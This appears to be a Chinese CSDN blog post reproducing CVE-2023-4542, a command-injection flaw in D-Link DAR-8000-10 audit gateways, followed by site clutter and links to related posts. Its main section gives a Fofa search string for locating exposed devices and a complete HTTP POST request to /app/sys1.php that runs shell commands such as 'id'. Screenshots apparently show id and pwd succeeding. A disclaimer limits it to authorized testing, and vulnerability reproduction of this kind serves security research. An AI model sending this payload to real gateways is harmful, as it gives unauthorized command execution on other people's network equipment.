D-Link DAR-8000操作系统命令注入漏洞(CVE-2023-4542)

已于 2023-11-03 14:44:34 修改
阅读量393 收藏
点赞数
分类专栏: 漏洞复现 文章标签: php 安全 web安全
于 2023-11-03 14:42:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44304678/article/details/134202668
版权

D-Link DAR-8000操作系统命令注入漏洞(CVE-2023-4542)

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

D-Link DAR-8000是中国友讯(D-Link)公司的上网行为审计网关。

D-Link DAR-8000-10版本存在操作系统命令注入漏洞。

漏洞影响

D-Link DAR-8000-10

漏洞危害

该漏洞源于文件/app/sys1.php的参数id会导致操作系统命令注入。

网络测绘

Fofa: body=“DAR-8000-10”

在这里插入图片描述
在这里插入图片描述

漏洞复现

1. 构造poc

POST /app/sys1.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 6

cmd=id

2. 发送数据包,执行命令

id命令

在这里插入图片描述

pwd命令

在这里插入图片描述

小胡yhu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
wavlink 路由器 多处前台RCE漏洞复现
0xSec
12-21 1129
WAVLINK路由器mesh.cgi、nightled.cgi、live-api.cgi等接口处存在命令执行漏洞,攻击者可通过该漏洞获取服务器权限。包含型号WN530HG4、WN531G3、WN572HG3、WN535G3、WN575A4等。
D-Link DAR-8000操作系统命令注入漏洞(含批量验证poc)
weixin_43567873的博客
04-04 34
D-Link DAR-8000操作系统命令注入漏洞(含批量验证poc)
D-Link DAR-8000操作系统命令注入漏洞(CVE-2023-4542)_wavlink wn535k2 和 wn535k3 操作系统命令注入漏洞(cve-2022-2487
m0_61369523的博客
04-07 745
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
dar64-2.6.13-win64.zip
02-22
DAR-磁盘存档 DAR-磁盘存档 用于完整,增量,压缩和加密的备份或存档 DAR是一种命令行备份和存档工具,它使用选择性压缩(不压缩已压缩的文件),强大的加密功能,可以将存档拆分为给定大小的不同文件并提供即时...
CAD快捷键-CAD常用快捷键命令大全.docx
11-15
本文档总结了 CAD 软件中常用的快捷键命令大全,包括绘图命令、修改命令、视窗缩放、尺寸标注、对象特性等多个方面。 一、绘图命令 在 CAD 软件中,绘图命令是最基本也是最重要的命令。通过这些命令,可以快速地...
node-v4.2.4-dar
01-18
node-v4.2.4-darwin-x64(Mac OS X Binaries).tar.gz node-v4.2.4-darwin-x64.tar.gz node.js for Mac OS X Binaries (.tar.gz) 64位 大小: 9.35 MB (9,813,549 字节)
elasticsearch-6.5.4.tar.gz及...
03-05
elasticsearch-6.5.4.tar.gz + kibana-6.5.4-darwin-x86_64.tar.gz + elasticsearch-analysis-ik-6.5.4.zip,课程所需的三个包都有,需要百度云下载
行业分类-设备装置-动态增强现实媒体创建.zip
08-24
动态增强现实(Dynamic Augmented Reality,简称DAR)是一种先进的技术,它将数字信息与现实世界无缝融合,为用户创造互动、沉浸式的体验。在行业分类中,动态增强现实主要应用于设备装置领域,用于提升产品设计、...
Vue3+ element plus 前后分离admin项目安装教程
最新发布
luck332的专栏
07-21 306
前后分离admin项目安装基于 vue3.x + CompositionAPI + typescript + vite + element plus + vue-router-next + pinia,适配手机、平板、pc 的后台开源免费模板,希望减少工作量,帮助大家实现快速开发。
华为HCIP Datacom H12-821 卷42
QIN_yuexiang的博客
07-17 353
转换的第一步将FFFE插入MAC地址的公司标识和扩展标识符之间,第二步将从高位数,第7位的0改为1,1改为0。这种由MAC地址产生IPv6地址接口标识的方法可以减少配置的工作量,尤其是当采用无状态地址自动配置时,只需要获取一个IPv6前缀就可以与接口标识形成IPv6地址。已知某接口的MAC地址为OA-04-3B-45-1A-03,那么根据IEEE EUI-64规范生成的接口ID标识为:___-___-___-___-___-___-1A-03。数据链路层——ARP欺骗 网络层—Smurf攻击;
【Docker】Docker-compose 单机容器集群编排工具
F12138X的博客
07-18 1547
顽强的毅力可以征服世界上任何一座高峰
全新UI自助图文打印系统小程序源码/自助云打印机前后端源码
12年全栈程序开发
07-17 324
这些服务覆盖了多种文件格式,包括文档、图片、表格等。除此之外,系统还集成了额外的特色功能,如美颜、换装以及文档打印等,以满足用户的不同需求。管理员可进管理后台对打印机进行管理。最新的自助图文打印系统和证件照云打印小程序源码采用了PHP作为后端开发语言,旨在为用户提供全面的自助打印服务。
阿里云短信PHP集成api类
༺墨༒眉༻
07-17 286
无需安装sdk扩展包,直接引入类即可使用。
深入理解Linux网络(一):内核如何接收网络包
又见南风的博客
07-18 819
在上⾯的代码中跟踪函数调⽤, __igb_open => igb_request_irq => igb_request_msix , 在 igb_request_msix 中我们看到了,对于多队列的⽹卡,为每⼀个队列都注册了中断,其对应的中断处理函数是 igb_msix_ring(该函数也在 drivers/net/ethernet/intel/igb/igb_main.c 下)。如协议注册⼩节看到 inet_protos 中保存着 tcp_v4_rcv() 和 udp_rcv() 的函数地址。
[web]-反序列化-绕过__wakeup(转)
mails2008的专栏
07-18 328
终点:很直接是echo $flag,在__destruct中,username==='admin' 和 password==100。反序列化过程中发现起点在终点之前调用,反而是捣乱的,那我们就不需要自动执行__wakeup,绕过的方法,设置的字段数量比实际字段大的值。其实简单的很简单,难得也很难,慢慢学习就好,没必要焦虑,觉得很难,纯粹一个兴趣爱好就行。起点:_wakeup函数中是$this->username='guest',是给赋值;按照常规思路,寻找起点、终点、跳板。
接入百度文心一言API教程
荻酷网的博客
07-21 586
然后,编辑文章。点击AI识别摘要,然后保存即可COREAIPOWER设置暂时只支持经典编辑器.古腾堡编辑器等几个版本后支持.在比期间,你可以自己写点摘要摘要内容AL识别摘要清空。
Linux(CentOS7)部署PHP-7.2.17源码包
thetender的博客
07-18 1066
LAMP系统安装 通过PHP的源码包部署PHP-7.2.17版本
thinkphp8结合layui2.9 图片上传验证
quweiie的专栏
07-21 92
thinkphp8图片上传的验证
CMMI-DEV-v1.3 技术批注版:提升软件开发过程
- 决策分析与解决(DAR):进行决策分析,以支持关键决策的制定。 - 供应商协议管理(SAM):管理与供应商相关的合同和协议。 2. 模型实施方法: - 连续表示法(Continuous):关注特定过程域的成熟度,允许组织...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值